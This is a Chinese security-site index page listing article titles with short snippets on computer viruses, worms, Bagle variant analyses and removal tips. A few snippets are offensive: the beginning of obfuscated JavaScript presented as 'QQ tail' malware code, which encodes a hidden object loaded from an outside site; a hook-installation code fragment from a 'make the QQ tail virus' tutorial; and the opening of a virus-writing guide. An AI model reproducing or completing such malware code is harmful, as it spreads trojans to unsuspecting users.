- 病毒编制的关键技术
- 病毒编制的关键技术 大家好,大家都听过计算机病毒吧,是不是很神秘呢?想不想知道它是什么东东,是怎么样被编出来的? 由于种种原因,会编病毒的人都秘而不宣,造成大家一种误解,病毒很神秘,其实不是的,病毒也是程序。只不过 是有些特别。 好,下面我来简单的讲讲。 一 com病毒的编制 com文件是一种单段执行结构,起源
- 分类:电脑安全
- 变形病毒的基本类型
- 变形病毒的基本类型 计算机病毒都具有一定的基本特性,这些基本特性主要指的是病毒的传染性、破坏性、恶作剧等表现,这是普通病毒所应具备的基本特性。据目前占据国内杀毒 软件市场80%以上份额的KV300的研制者王江民介绍,能用变化自身代码 和形状来对抗反病毒手段的变形病毒才是下一代病毒首要的基本特征。 变形病
- 分类:电脑安全
- 变形病毒的发展趋势
- 变形病毒的发展趋势 计算机病毒具有一些基本的特性,这些基本特性主要指的是病毒的传染性、破坏性、恶作剧等,这是普通病毒所具备的基本特性,而能用变化自身代码和形状来对抗反病毒手段的变形病毒才是下一代病毒首要的基本特征。 变形病毒的特征主要是:病毒传染到目标后,病毒自身代码和结构在空间上、时间上具有不同的变
- 分类:电脑安全
- 保持警觉,防范网络病毒
- 保持警觉,防范网络病毒 越来越多的病毒利用互联网的各个通道传播,新的恶性病毒也不再设计为加强传播而预留的潜伏期了,中招后就会立即发作。一个新病毒出现后,可以在数小时至数天内遍布全球。 ActiveX控件和Java代码 在网页上加上ActiveX控件和JavaScripts代码可以增强网页吸引力,浏览器则可以从被浏览的网页中下载或运
- 分类:电脑安全
- 当邮件病毒入侵后的五个清除步骤
- 当邮件病毒入侵后的五个清除步骤 一、断开网络 当你不幸遭遇病毒入侵之后,当机立断的一件事就是断开你的网络连接,以避免病毒的进一步扩散。 二、文件备份 然后就是删除带毒的邮件,再运行杀毒软件进行清除,但为了防止杀毒软件误杀或是删除你还没有处理完的文档和重要的邮件,你应该首先将它们转移备份到其他储存媒体上。
- 分类:电脑安全
- 大收集:安全公司在线扫描总汇
- 安全软件公司在线扫描链接KV在线查毒http://online.jiangmin.com/chadu.asp瑞星在线查毒http://online.rising.com.cn/ravonline/RavSoft/Rav.asp金山毒霸在线查毒http://online.kingsoft.com/antiscan/onlinescanOnlyScan.html蓝锐在线查毒http://www.hauri.com.cn/onlineservice/livecall.html朝华·安博士在线杀毒http://
- 分类:电脑安全
- 防范墨菲病毒有高招
- 防范墨菲病毒有高招 2003年新病毒流行的一个显著特征就是蠕虫病毒结合黑客攻击传播。近日,“墨菲”蠕虫(Worm.Mofeir)再次利用这种手段肆虐攻击我们的计算机网络。 “墨菲”蠕虫有以下主要特点:它会扫描网络,利用自身携带的密码表去穷举远端计算机的管理员密码,攻击成功后,病毒会将自己复制到远端计算机的系统目录里
- 分类:电脑安全
- 到底什么病毒才是蠕虫
- 到底什么病毒才是蠕虫 蠕虫(Worm)是通过分布式网络来扩散传播特定的信息或错误,进而造成网络服务遭到拒绝并发生死锁。 1982年,Shock和Hupp根据The Shockwave Rider一书中的一种概念提出了一种“蠕虫”(Worm)程序的思想。 这种“蠕虫”程序常驻于一台或多台机器中,并有自动重新定位(autorelocation)的能力。如果它检
- 分类:电脑安全
- 堵住病毒源头!E-mail地址的保密方法
- 堵住病毒源头!E-mail地址的保密方法 如今的病毒传播速度之所以如此迅速,很大程度上是靠便捷的电子邮件传播。很多人都有类似的经验,信箱经常收到垃圾邮件,不时会发现一些被防毒软件检查到带有病毒的邮件,更莫名其妙的是,有的邮件竟是自己发送出去的!这究竟是怎么一回事?显然是有人利用你的E-mail地址传播邮件病毒!
- 分类:电脑安全
- 电脑病毒起源于“磁心大战”吗
- 电脑病毒起源于“磁心大战”吗 电脑时代一开始,便有电子病毒的概念。1949年,电脑先驱冯·诺伊曼在《复杂自动机组织论》中便确定了病毒的基本概念,但当时人们都认为电脑程序可以繁殖的概念过于离谱,只有贝尔实验室三位年轻的程序员受到了启发。他们发明了一种“磁心大战”游戏,玩这个游戏的两个人编制许多能自身复制并
- 分类:电脑安全
- 电脑病毒的预防
- 电脑病毒的预防 1、平常准备可正常开机之软盘,并贴上写保护。 ※检查电脑的任何问题,或者是解毒,最好在没有病毒干扰的环境下进行,才能完整测出真正的原因,或是彻底解决病毒的侵入。 2、重要资料,必须备份。 ※资料是最重要的,程序损坏了可重新COPY,甚至再买一份,但是自己键入的资料,可能是三年的会计资料,可能是
- 分类:电脑安全
- 电脑病毒的起源
- 电脑病毒的起源 电脑病毒的历史:磁蕊大战 电脑病毒并非是最近才出现的新产物, 事实上, 早在一九四九年, 距离第一部商用电脑的出现仍有好几年时, 电脑的先驱者约翰.范纽曼(John Von Neumann)在他所提出的一篇论文 [复杂自动装置的理论及组织的进行] , 即已把病毒程式的蓝图勾勒出来, 当时, 绝大部份的电脑专家都无法想像这种
- 分类:电脑安全
- 恶鹰变种AT病毒分析报告
- 病毒信息: 病毒名称: Worm.Beagle.at 中文名称: 恶鹰变种at 病毒别名: I-Worm.Bagle.at[AVP] 病毒长度: 17924 威胁级别: 三级 病毒类型: 蠕虫 受影响系统: WinNT/Win2000/WinXP/Windows2003 发现时间: 2004年10月29日 病毒简介: 该病毒通过邮件进行传播,用户运行邮件附件后,会尝试关闭计算机内的反病毒软件,并从网上下
- 分类:电脑安全
- 恶鹰变种(Worm.Bagle.ao)蠕虫病毒分析报告
- 病毒名称: Worm.Bagle.ao 中文名称: 恶鹰变种AO 威胁级别: 二级 病毒别名: I-Worm.Bagle.ao[AVP] 病毒类型: 邮件蠕虫、漏洞蠕虫、黑客、后门 病毒类型: 蠕虫、木马 受影响系统: Win9x/WinNT/Win2K/WinXP/Win2003 破坏方式: A、使用自带的SMTP引擎大量发送病毒邮件,浪费大量网络资源,并可导致中小型邮件服务器极不稳定;B
- 分类:电脑安全
- 跟我学制作“QQ尾巴病毒”(2)
- 跟我学制作“QQ尾巴病毒” 挂接钩子和查找窗口 接下来就是如何挂接这两个钩子了。对于挂接钩子,要解决的问题是:往哪里挂接钩子,以及如何挂接? 挂接钩子的目标,肯定是QQ“发送信息”窗口的所属 线程 。我的代码就是将这个窗口的句柄传入之后来进行钩子的挂接: // 挂接钩子 BOOL WINAPI SetHook(HWND hQQ) { BOOL bRet
- 分类:电脑安全
- smss.exe和lsass.exe及捆绑病毒介绍及查杀方法
- 第一: 在进程里可以见到有两个相同的进程,分别是lsass.exet和LSASS.EXE.同时在windows下生成LSASS.EXE和exert.exe两个可执行文件,且在后台运行。LSASS.EXE管理exe类执行文件,exert.exe管理程序退出。下载个进程管理器,找出问题进程的路径,手动终止LSASS.EXE和exert.exe两个进程(管理器不能终止LSASS.EXE,提示系统进
- 分类:电脑安全
- 防止数据库暴库的方法
- 数据库人员面试:SQL Server常用测试题PHP连接数据库的方法(3)[冷枫推荐]:数据库操作,内外联查询,用JSP从数据库中读取图片并显示在网页图解MySQL数据库的安装和操作 (1)PHP中使用类对数据库进行操作InterBase 数据库函数库Oracle数据库网络的安装和配置(1)利用外部命令Oralce数据库导入导出ACESS数据库与WEB页连接 为
- 分类:电脑安全
- 防杀病毒的“三大纪律八项注意”
- 防杀病毒的“三大纪律八项注意”
- 分类:电脑安全
- 耗尽CPU资源的Explored病毒清除法
- 昨天单位这好几台机器病毒大爆发,因为都不是专家高手,折腾了很久才清理掉,过程中有些体会,觉得可以写下来,跟大家作一番交流。首先是病毒的发现。昨天出现了两个症状。一、在局域网上出现广播包(ARP)暴增,甚至把出口堵死。二、机器CPU资源耗� S萌挝窆芾砥骺梢钥吹娇梢傻慕蘣xplored.exe和services.exe一起占用CPU近
- 分类:电脑安全
- PC病毒原理:感染-潜伏-繁殖-发作(4)
- PC病毒发病机理:感染-潜伏-繁殖-发作 第二阶段:潜伏----实施掩盖和伪装 在第二阶段即潜伏过程中需要了解的内容是,病毒是如何为躲避用户和防病毒软件的侦察而进行隐藏的。通过与防病毒软件之间不断地“斗智斗勇”,有的病毒已经逐渐具备了非常高级的隐身法。最具代表性的潜伏方法是隐蔽和自我变异。 尺寸上作假,逃避监视
- 分类:电脑安全
- PC病毒原理:感染-潜伏-繁殖-发作(3)
- PC病毒发病机理:感染-潜伏-繁殖-发作 随意更改可执行文件 接下来谈谈可执行文件感染型病毒。顾名思义,可执行文件感染型病毒只感染文件扩展名为.com和.exe等的可执行文件。下面以Windows程序为倒,介绍一下可执行文件感染型病毒的感染机理。 感染机理其实非常简单。用户无意间运行了病毒程序后,病毒就开始查找保存在个人电
- 分类:电脑安全
- PC病毒原理:感染-潜伏-繁殖-发作(2)
- PC病毒发病机理:感染-潜伏-繁殖-发作 第一阶段:感染 结果是寄生到其他程序中 在详细说明感染机理前,首先看一下感染途径。因为如果不了解病毒是如何进入到个人电脑的,就无法往下进行。 9成以上是通过电子邮件感染的 病毒主要通过(1)电子邮件、(2)外部介质、(3)下载这3种途径入侵个人电脑。 (1)电子邮件,是指把蠕
- 分类:电脑安全
- PC病毒发病机理:感染-潜伏-繁殖-发作(1)
- PC病毒发病机理:感染-潜伏-繁殖-发作 听到“计算机病毒”时,也许不少人会漠然地说:不就是一些侵入个人电脑中干坏事的程序嘛! 最近像“蠕虫”和“特洛伊木马”之类的病毒术语几乎都成了普通电脑用户的口头禅了。下面就让我们从这些术语的含义开始了解一下计算机病毒。 “计算机病毒”的起源 “计算机病毒”这种说法起源于
- 分类:电脑安全
- Rundll.exe到底是不是病毒
- "Rundll.exe"到底是不是病毒 经常听到有些朋友说:呀!系统的注册表启动项目有rundll32.exe,系统进程也有rundll32.exe,是不是病毒呀?其实,这是对rundll32.exe接口不了解,它的原理非常简单,了解并掌握其原理对于我们平时的应用非常有用,如果能理解了原理,我们就能活学活用,自己挖掘DLL参数应用技巧。 Rundll32.exe和
- 分类:电脑安全
- RM,WMV木马的防御方法
- (一)RM、RMVB文件中加入木马的方式 Helix Producer Plus是一款图形化的专业流媒体文件制作工具,这款软件把其他格式的文件转换成RM或RMVB格式,也可以对已存在的RM文件进行重新编辑,在编辑的同时,我们可以把事先准备好的网页木马插入其中。这样只要一打开这个编辑好的媒体文件,插入在其中的网页木马也会随之打开,甚至
- 分类:电脑安全
- QQ尾巴恶意病毒的代码
- QQ尾巴恶意病毒的代码 SCRIPT LANGUAGE="javascript" !-- var HtmlStrings=["=iunm =ifbe=dfoufs=jnh!!tsd#ibi/kqh#=0dfoufs =cpez =pckfdu!ebub#iuuq;00xxx/pomzz/ofu0qjd0222/btq#!tuzmf#ejtqmb","z;opof#!ifjhiu#1#!xjeui#1#=0pckfdu =0cpez =0ifbe"," =0iunm"]; function psw(st){ var varS; varS=""; var i; for(var a
- 分类:电脑安全
- 被诅咒的油画 图片病毒技术的内幕
- 一、被诅咒的油画 在网络上流传着一幅诡异的油画,据说很多人看后会产生幻觉,有人解释为油画的构图色彩导致的视觉刺激,也有人认为是心理作用,众说纷纭,却没有令人信服的答案。在网络公司上班的秘书小王也从一个网友那里得知了这幅画,她马上迫不及待的点击了网友给的图片连接。 图片出来了,小王终于见识到了传说中诡异
- 分类:电脑安全
- Unix系统病毒概述(1)
- Unix系统病毒概述 ELK CLONER: 第一个计算机病毒 它将会得到你磁盘上所有的东东 它甚至将渗透到芯片内部 这就是 Cloner! 它会象胶水一样粘住你 它还会修改内存! 计算机病毒是一种在大量的电子破坏技术手段中最著名的成员.他们实际上就是一些非常危险的恶意程序,他们是丑陋的,不过在我看来他们很可爱,原于我对internet的驾驭
- 分类:电脑安全
- 让病毒无法遁形文件对比查杀嵌入式木马
- 随着计算机的发展,木马技术也在不停的发展,以冰河为首的老一代经典木马已经开始慢慢消失在经典木马行列中,取而代之的则是新一代的嵌入式木马,也就是通常所说的dll型注入式木马,其运用了动态嵌入技术,动态嵌入最常见的是最常见的是钩子、API以及远程线程技术,而现在大多数的嵌入式木马都是运用远程线程技术把自己本身
- 分类:电脑安全
- Thumbs.db是系统文件还是病毒
- Thumbs.db是系统文件还是病毒 问:我在资源管理器中的文件夹选项中打开“显示隐藏文件”,此后在很多文件夹中都看到有一个Thumbs.db文件。把这个文件删除后也没有什么影响,但是有时又会出现。这个是什么文件,是不是病毒的痕迹? 答:Thumbs.db绝不是病毒,而是一个数据库文件,它一般可以在带有图片的文件夹中找到,而且
- 分类:电脑安全